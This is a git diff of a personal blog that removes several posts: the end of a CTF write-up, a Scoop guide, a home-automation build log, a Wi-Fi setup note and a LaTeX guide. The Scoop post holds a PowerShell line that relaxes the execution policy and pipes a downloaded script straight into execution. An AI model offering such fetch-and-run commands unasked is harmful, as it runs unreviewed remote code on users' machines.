varied) -target: a -``` - -The solution is really simple, but it's pretty hard to get to it. You want to -remove 'a's so I started with `a => `, this turn all 'a's to None and left you -with an empty string. The problem is you can't substitute anything in an empty -string. The solution was `aa => a`, this removed an 'a' every time the initial -string got checked. To get this solution you had to realize, that the program -would always substitute the first instance it would come across, and the -program was set to do way more than needed substitutions. This would come handy -in the next level. - -``` -level 4: -initial: ggggggggggg (the amount of g's varied) -target: ginkoid -``` - -After completing level 3 this level looks very easy, just substitute the g's -like before `gg => g` and turn the last g into ginkoid `g => ginkoid` , but -this didn't work because of the way the program worked, after getting to a -valid solution I didn't stop and the single g in ginkoid would also change to -ginkoid. You would get infinite ginkoid. The solution was: - -``` -gg => ginkoid; ginkoidginkoid => ginkoid; ginkoidg => ginkoid -``` - -I began with noticing you couldn't just change the g, because that would also -change the g in ginkoid. so double gg becomes ginkoid. We have to use the same -trick as in level 3 to gain only one ginkoid `ginkoidginkoid => ginkoid` -because of the way we changed the single g's to ginkoid it would only work with -an even amount of g's. In the case there was an uneven amount of g's we would -be left with ginkoidg, so we remove it `ginkoidg => ginkoid`. - -I found this challenge really enjoyable and during this challenge I noticed -that I most enjoy the puzzle aspect of computer science, puzzling for hours to -fix a bug and then finally finding a solution. - -I didn't complete many challenges and wasn't really able to help Loek, but I -really enjoyed the CTF. It's a really fun way to test your skills and -knowledge. In the end I'm really happy with the score we (mostly Loek) got and -I think I’ll take part in other CTFs in the future. - -## Epilogue - -Of the 47 total challenges, me and Willem only solved 15. My end goal for this -CTF wasn't winning to begin with, so the outcome didn't matter for me. After -the second day I set the goal of reaching the 3rd page of the leaderboards as -my goal, and we reached 277'th place in the end which made my mom very proud! - -![](/img/redpwn2021/leaderboard.png) - -I enjoyed the CTF a lot! There were some very frustrating challenges, and I -still don't get how people solved web/wtjs, but that's fine. I did learn how to -use GDB and a lot of other things during the CTF which were all very rewarding. -I will definitely be participating in the 2022 redpwnCTF, and maybe even some -others if they're beginner friendly :) - -During the Radboud CTF and this CTF I've accumulated a lot of ideas to maybe -host one myself, though I have no clue where to start with that. Maybe keep an -eye out for that ;) - diff --git a/_posts/2021-07-22-scoop.md b/_posts/2021-07-22-scoop.md deleted file mode 100644 index 36c7cc2..0000000 --- a/_posts/2021-07-22-scoop.md +++ /dev/null @@ -1,118 +0,0 @@ ---- -title: Scoop guide -subtitle: Handbook and quick explanations -tags: - - windows - - normie - - software -cover: /img/scoop.png ---- - -Here's a quick reference for returning customers: - -```bash -# installing stuff -scoop install - -# removing stuff -scoop uninstall - -# updating all the stuff -scoop update * - -# update single stuff -scoop update - -# add a bucket / repository -scoop bucket add - -# searching for stuff -scoop search -# keep in mind that scoop's search is very slow -``` - -For more things look in the [wiki](https://github.com/lukesampson/scoop/wiki) -or in the wiki's [faq](https://github.com/lukesampson/scoop/wiki/FAQ). - -Now here's a list of things that people who don't use `cmd` get confused about: - -- Highlighting text in cmd selects it. If you've selected text, right click - copies it. If you don't have text selected, right click pastes it. -- Ctrl-c and ctrl-v won't work as you expect them to. The same goes for most - keyboard shortcuts commonly used in graphical ('normal') programs. Ctrl-c is - used to stop programs in cmd, and ctrl-v doesn't do anything. The keyboard - shortcut for pasting in cmd is shift+insert. -- Clicking inside the cmd window to place your text cursor doesn't work, - because clicking is only used for selection. You'll have to use your arrow - keys to move the cursor. You can also use ctrl-a to move it to the beginning - of a line, or ctrl-e to move it to the end of a line. -- It's normal for programs in cmd to not give any output and just silently - quit. This is normal and if a program doesn't output anything you can assume - it did the thing you wanted it to do. (though scoop is very verbose and will - print progress info most of the time) -- You can type new commands for the computer to execute once you see the prompt - again. Most of the time it looks something like this: - - ``` - C:\Windows\System32> - ``` - -## Installation (on a fresh system) - -```powershell -Set-ExecutionPolicy RemoteSigned -scope CurrentUser -iwr -useb get.scoop.sh | iex -``` - -## Some more things explained - -### Why scoop at all - -Scoop is a package manager. These are the primary way you install software on -Linux. The reason package managers are awesome, is because it's like an app -store in the sense that it's one central place to install all your software, -but without the downsides of an actual app store. - -If you develop your own software, you can write a scoop install script for it, -and create a pull request on GitHub. This way basically anyone can add software -into scoop, but it's still moderated better than for example wikipedia. - -Scoop also has more open source software, which is better (most of the time). -This means you're more likely to get 'better software' like 7-zip instead of -(bad) (paid) software like winrar or winzip. - -Scoop also uses powershell scripts to install software which means you won't -have to click through installers, or watch out for sneaky buttons that also -install some weird toolbar in your browser. - -### Buckets - -Buckets are a collection of similar programs. The way these are managed is -through something called a repository. This is just a central place for -multiple people to view and collaborate on scoop at once. - -Buckets you'll probably want to add are `extras`, `nonportable`, `games`, and -`java`. - -By adding a bucket you're not actually installing any software, but scoop will -check for updates on that bucket. - -If you want to for example install java using scoop, you'll first have to add -the `java` bucket by running `scoop bucket add java` in order for scoop to be -able to find the `openjdk` package. Then you can run `scoop install openjdk`, -and then you'll have java installed. - -### Brave (browser) - -Because the default brave browser in scoop isn't updated, I use the [everonline -repo](https://github.com/everonline/brave). Here's how to do that: - -```bash -scoop bucket add everonline https://github.com/everonline/brave.git -scoop install everonline/brave -``` - -## Awesome software - -[Here's](/post/software#pc-software) a list of the software I use pretty much every day, -and some of it is also available for windows using scoop! diff --git a/_posts/2021-08-17-homeauto.md b/_posts/2021-08-17-homeauto.md deleted file mode 100644 index 544cf07..0000000 --- a/_posts/2021-08-17-homeauto.md +++ /dev/null @@ -1,259 +0,0 @@ ---- -title: My home automation adventure -subtitle: How to make your house a shitty utopia -tags: - - home automation - - raspberry pi - - esp8266 - - cc2500 - - microcontrollers - - software - - hardware - - hacking -cover: /img/homeauto.png ---- - -Home automation is cool, but it can also be scary. I want to try to convert my -existing bedroom lights into 'smart' lights that I can control using a home -automation system. - -I've tried two home automation systems so far: homebridge and home assistant. -Homebridge isn't really an automation system. It's meant to add unsupported -devices to *homekit*, but doesn't work with anything other than apple devices. -I've also tried (and am currently using) home assistant. It's a complete -replacement for the homekit ecosystem, and it can do basically anything, as -long as you're patient enough... - -The devices I'm going to try to automate are: - -- A random bluetooth RGB/white lamp I bought a couple years back -- An RGB strip under my bed my mom got me for christmas -- A gen 1 Philips LivingColors lamp from 2008 -- My Toshiba RAS-M10GKV-E2 air conditioning unit - -## Bluetooth RGB lamp - -This lamp is apparently another Chinese product that gets rebranded and sold -under different names. I bought mine as the "[Shada led's -light](http://leds-lightpro.com/node/4368)" (no the apostrophe isn't a typo). - -When scanning for bluetooth devices using `bluetoothctl` on Linux, it shows up -as an LE device called "Beken LED". - -I don't remember what search term I used when searching for it's bluetooth -protocol, but I landed on [this page](https://wiki.fhem.de/wiki/BEKEN_iLedBlub) -from a german website about home automation, where it's called the "BEKEN -iLedBulb". It documents which Bluetooth LE characteristics you need to write to -for the lamp to change color. - -The lamp has both [iOS](https://apps.apple.com/us/app/leds-light/id1058642950) -and -[android](https://play.google.com/store/apps/details?id=com.shada.ledslight&hl=en_US&gl=US) -apps available, though only the iOS app seemed to work. - -### Writing a homebridge plugin - -When I started out with this home automation business, I used homebridge -because I didn't know about home assistant yet. Developing plugins for -homebridge is actually pretty easy (after figuring out [how to get the plugin -to load](https://github.com/homebridge/homebridge/issues/2958)). The -documentation is pretty good, and it has typescript integration for maximum -/comfy/-ness. - -Because HomeKit doesn't support RGBW or RGBWW lights (lights that have both rgb -and dedicated white diodes), I chose to display them as seperate rgb and white -lamps inside the home app. - -[The plugin](https://www.npmjs.com/package/homebridge-beken) is pretty janky, -and requires some manual setup, but it worked very consistently for the single -week I used it for. - -### Converting the homebridge plugin to home assistant - -Now that I could control a single bulb using the home app and siri, I needed -more. The homebridge website allows for turning devices on/off, but doesn't -allow color changes. I also liked the idea of controlling the lights using my -phone, which runs android. - -Home assistant was the solution, so I went ahead and installed [home assistant -core](https://www.home-assistant.io/installation/linux#install-home-assistant-core) -on the Raspberry Pi 3B+ I'm using as a dedicated home automation hub. - -Upon opening it for the first time, I noticed it was much slower than -homebridge, but that's because it was installing a bunch of other stuff in the -background. After waiting for the background tasks to complete, I was greeted -with a very nice web interface. There were also already devices that I could -integrate immediately, like the downstairs chromecasts, and my Jellyfin server. - -Now I had to figure out how to write a plugin for home assistant. There's some -concepts in the home assistant ecosystem that I didn't quite understand, which -made searching where to start harder. - -**Integrations** are like plugins, they allow you to *integrate* an unsupported -device into home assistant. Integrations create **devices** which create -**entities** (device properties). Certain entity types can only be read (like -`sensor`), and others can also be updated / written to (lights). - -The documentation for creating entity integrations is pretty poopy, and I -mostly used other plugins on GitHub as reference material. The home assistant -plugin code is available on -[GitHub](https://github.com/lonkaars/homeassistant-beken) and [my personal git -server](https://git.pipeframe.xyz/lonkaars/homeassistant-beken/about). - -## RGB gamer bed - -I was originally planning to control this strip using IR remote emulation, but -I remembered a friend of mine still had an esp8266 laying around. So I went the -extra mile and wanted to try to create a new driver board for the strip -instead. - -### Opening the original driver - -![](/img/homeauto/controller_original.jpg) - -![](/img/homeauto/opening_controller.jpg) - -![](/img/homeauto/open_controller.jpg) - -![](/img/homeauto/controller_board.jpg) - -### Making a custom driver board - -**I AM NOT AN ELECTRICIAN**. I looked on the internet, and I think this is just -a simple board with some mosfets and flash memory for storing the 6 custom -colors. The mosfets are the 3 big squares labeled Q1, Q2 and Q3. The way the -strip works is it gets +12v though the black wire, and then lights up when you -ground any combination of the red, green, and blue wires. The strip dims using -pulse width modulation. The mosfets act like an electronic switch, and control -the grounding of the colored wires. - -I'm going to salvage the mosfets, and barrel plug from the original driver -board, and resolder them on a perfboard with the esp8266 so I can control them -over WiFi. The schematic I'm using comes from -[instructables](https://www.instructables.com/WiFi-Controlled-RGB-LED-Strip-With-ESP8266/). - -![](/img/homeauto/schematic.png) - -The whole solder job was a complete massacre, and I really don't want to show -it. It does work though, but I had to buy a new soldering station because my -old soldering iron wasn't really fit for soldering small electronics. - -### Beautiful dremel work - -I wanted to use the original enclosure instead of a tupperware container this -time, so I used my dad's dremel to create holes for the esp to fit. - -![](/img/homeauto/shittydremel.png) - -![](/img/homeauto/espfit.png) - -As you can see I did a great job :^) - -The esp is still at the bottom of the case, but getting everything to fit -inside was so hard that I completely forgot to take pictures. So here's a -picture of the finished controller mounted under my bed using two small nails: - -
- -
Job well done
-
- -### ESP firmware - -The firmare I wrote for the esp is available on -[GitHub](https://github.com/lonkaars/esp8266-rgbstrip) and [my git -server](https://git.pipeframe.xyz/lonkaars/esp8266-rgbstrip/about), along with -the home assistant plugin -([GitHub](https://github.com/lonkaars/hass-esp8266-rgbstrip), -[cgit](https://git.pipeframe.xyz/lonkaars/hass-esp8266-rgbstrip/about)). I used -the [espressif ESP8266_RTOS_SDK](https://github.com/espressif/ESP8266_RTOS_SDK) -toolchain with gnu make as my build system. - -It just connects to your specified wifi network under your specified hostname, -and listens on port 80 for regular http requests. Here's how to use it without -the home assistant plugin: - -```bash -# get color -curl http://hostname/ - -# set color rrggbb color (hex) -curl -X POST -d "0000ff" http://hostname/ -``` - -Some cool features this firmare has are: - -- Linearly interpolated color transitions with customizable transition and step - duration -- Brightness curve correction (makes difference in brightness more pronounced - at higher brightness levels by using a parabolic curve) - -I'm not sure if the more popular [ESPHome](https://esphome.io/) firmare has -these features, but I wanted to have a go at writing my own firmare anyways. - -### Safety - -Because the esp8266 is a pretty basic microcontroller, it doesn't use https or -ssl for encryption. To protect from people in my house wanting to control my -lights, I used the raspberry pi's onboard wifi module to create a hidden -private isolated wifi network for this, and all future IoT devices in my -bedroom. I'm using `hostapd` to create the wifi network, and `dnsmasq` for -assigning ip addresses and hostname resolution. Here's the config file for -`dnsmasq`: - -``` -no-resolv -interface=wlan0 -dhcp-range=10.0.0.1,10.0.0.16,24h -server=8.8.8.8 -``` - -And here's `hostapd`'s config file: - -```bash -# common settings -interface=wlan0 -driver=nl80211 -ssid=network_name_here -hw_mode=g -channel=1 -macaddr_acl=0 -auth_algs=1 -ignore_broadcast_ssid=1 -wpa=2 -wpa_passphrase=network_password_here -wpa_key_mgmt=WPA-PSK -rsn_pairwise=CCMP - -# raspberry pi 3b+ specific settings -ieee80211n=1 # 802.11n support -wmm_enabled=1 # QoS support -ht_capab=[HT40+][SHORT-GI-20][DSSS_CCK-40] -``` - -Very complicated stuff... - -## Philips LivingColors lamp - -[This](http://www.knutsel.org/2009/01/01/livingcolors-1st-generation/) article -describes all the research that went into reverse-engineering the lamp. - -I ordered a cc2500 wireless transmitter and receiver, but the seller cancelled -the order, and now I have to wait a while longer to get one. I'll update this -article once I've set it up though. - -## Toshiba air conditioning unit - -I created a small daughter board to connect to the raspberry pi's gpio pins, -that has an IR phototransistor and IR blaster. This is so I could record and -replay the IR messages from the remote more easily. - -I've spent a solid two days now trying to use my raspberry pi or arduino uno as -a janky logic analyzer, to capture the IR messages and get the message contents -manually, but I still haven't succeeded. I have however succeeded in frying the -IR LED by giving it +5v backwards without any protection, so that's something I -guess. I'll update this section of the article together with the Philips lamp. - - -To be continued... - diff --git a/_posts/2021-09-09-avanswifi.md b/_posts/2021-09-09-avanswifi.md deleted file mode 100644 index 95cfbfe..0000000 --- a/_posts/2021-09-09-avanswifi.md +++ /dev/null @@ -1,27 +0,0 @@ ---- -title: Avans wifi setup -subtitle: How to use Avans eduroam with NetworkManager -tags: - - software -cover: /img/avanswifi.png ---- - -I wasted 2 hours trying to set up my school's WiFi, so here's a quick reference -for other students who might've tried connecting but ended up giving up. - -``` -$ nmcli connection edit type wifi -nmcli> set 802-11-wireless.ssid eduroam -nmcli> set 802-1x.eap peap -nmcli> set 802-1x.phase2-auth mschapv2 -nmcli> set 802-1x.identity -nmcli> set 802-1x.password -nmcli> set wifi-sec.key-mgmt wpa-eap -nmcli> save -nmcli> activate -``` - -Keep in mind that your username isn't your student e-mail, but the first letter -of your first name, and 7 characters from your last name, e.g. `Loek Le -Blansch -> lblansch`. - diff --git a/_posts/2022-01-24-latex.md b/_posts/2022-01-24-latex.md deleted file mode 100644 index 11db094..0000000 --- a/_posts/2022-01-24-latex.md +++ /dev/null @@ -1,132 +0,0 @@ ---- -title: My LaTeX setup -subtitle: How to set up a simple LaTeX environment with XeTeX and latexmk -tags: - - software - - latex - - git -cover: /img/latex.png ---- - -I started using LaTeX instead of MS Word about two years ago, and I've never -regretted the decision. I switched out of frustration because Word makes it -really easy to mess up your document structure without you noticing. - -## Cool features LaTeX gets you - -- Automatically numbered figures with references that automatically update -- Really simple bibliography management with `biblatex` -- Packages that help you typeset scientific things like chemistry or physics -- Professional looking output documents with very little effort -- Automation of repetitive things with macros -- It's a plain text format, so it works well with `git` or other version - control software -- Probably more - -## Installation - -This guide is for Arch Linux and it's derivatives, but you can use -[pkgs.org](https://pkgs.org) to find the mentioned packages if they're under a -different name in your distro's package manager. - -### Required packages - -- `biber` -- `texlive-most`, containing: - - `texlive-bibtexextra` - - `texlive-core ` - - `texlive-fontsextra ` - - `texlive-formatsextra` - - `texlive-games` - - `texlive-humanities` - - `texlive-latexextra` - - `texlive-music` - - `texlive-pictures` - - `texlive-pstricks` - - `texlive-publishers` - - `texlive-science` - -tl;dr - -``` -# pacman -S texlive-most biber -``` - -### Force XeTeX compiler with latexmk - -To force latexmk to use the `xelatex` compiler instead of `pdflatex` you can -create `~/.config/latexmk/latexmkrc` with the following content: - -``` -$pdflatex = "xelatex %O %S"; -$pdf_mode = 1; -$dvi_mode = 0; -$postscript_mode = 0; -``` - - -## Hello world - -> I have recently made another repository on my profile for template files, you -> can find it [here on github](https://github.com/lonkaars/templates) or [here -> on git.pipeframe.xyz](https://git.pipeframe.xyz/lonkaars/templates). It -> includes a latex starting point with more commonly used packages, and other -> files I tend to copy from other projects - -LaTeX uses a lot of auxiliary files for compilation, so it's a good idea to -create a new directory for every document. After creating a new directory, -create a .tex file and open it with a text editor. - -```tex -\documentclass[12pt, a4paper, dutch]{article} -\usepackage[margin=1in]{geometry} -\usepackage{babel} - -\bigskipamount=7mm -\medskipamount=4mm -\parindent=0mm - -\begin{document} -Hello world! -\end{document} -``` - -This is the starting point I generally use for all my documents. It uses a4 -paper and 2.54cm margins, which is the default in Word (in Europe). Because -most of my documents are in Dutch, I add the `dutch` option to my document -class, and import the babel package for correct word breaking and built-in -latex heading translations. I also disable paragraph indenting, and modify the -`\bigskip` and `\medskip` distances. - -After creating the .tex file, you can run `latexmk ` to compile -the document. When it's done, you should have a new .pdf file in your directory -with the same name as the .tex file. - -Keep in mind that you can probably install an extension for your text editor to -have it automatically compile and refresh your document for you. If you're -using Visual Studio Code, you can use the [LaTeX -Workshop](https://marketplace.visualstudio.com/items?itemName=James-Yu.latex-workshop) -extension, and for vim I use [vimtex](https://github.com/lervag/vimtex) with -[coc-vimtex](https://github.com/neoclide/coc-vimtex) for -[coc](https://github.com/neoclide/coc.nvim). - -## Notes - -### LaTeX and git - -Because LaTeX creates a lot of temporary files, you should add the following to -your repository's `.gitignore`: - -```gitignore -*.aux -*.bbl -*.bcf -*.blg -*.fdb_latexmk -*.fls -*.log -*.out -*.run.xml -*.synctex.gz -``` - diff --git a/_sass/globals.css b/_sass/globals.css index 81c0b75..769153e 100644 --- a/_sass/globals.css +++ b/_sass/globals.css @@ -8,14 +8,23 @@ html, body { hyphens: auto; } -.contentWrapper a { +.block { display: block; } + +.contentWrapper a.nolink { + color: unset; +} + +.contentWrapper a:not(.nolink) { color: var(--links); - text-decoration: none; position: relative; display: inline-block; } -.contentWrapper a::after { +.contentWrapper a { + text-decoration: none; +} + +.contentWrapper a:not(.nolink)::after { content: ''; position: absolute; left: 0; diff --git a/_sass/tags.css b/_sass/tags.css index 2468d3f..8e8e242 100644 --- a/_sass/tags.css +++ b/_sass/tags.css @@ -9,7 +9,7 @@ border-radius: 999px; text-decoration: none; - color: var(--fg); + color: var(--fg) !important; box-shadow: inset 0 0 0 2px var(--tag-color); diff --git a/index.md b/index.md index d80d642..e1758b9 100644 --- a/index.md +++ b/index.md @@ -27,16 +27,16 @@ https://{{ site.domain }}/atom.xml ## Recent posts
-{% for post in site.posts limit:4 %} -
- - post cover -

{{ post.title }}

- {{ post.subtitle }} - - {% include tags.html tags=post.tags %} -
-{% endfor %} + {% for post in site.items limit:4 %} +
+ + post cover +

{{ post.title }}

+ {{ post.subtitle }} + + {% include tags.html tags=post.tags %} +
+ {% endfor %}
[Go to all posts](/search){:.button} diff --git a/search.html b/search.html index ed39150..026a20c 100644 --- a/search.html +++ b/search.html @@ -13,5 +13,18 @@ toc: false -
+
+ {% for post in site.items %} +
+ + {{ post.title }} +

{{ post.subtitle }}

+

???

+ + + {% include tags.html tags=post.tags %} +
+ {% endfor %} +
+ -- cgit v1.2.3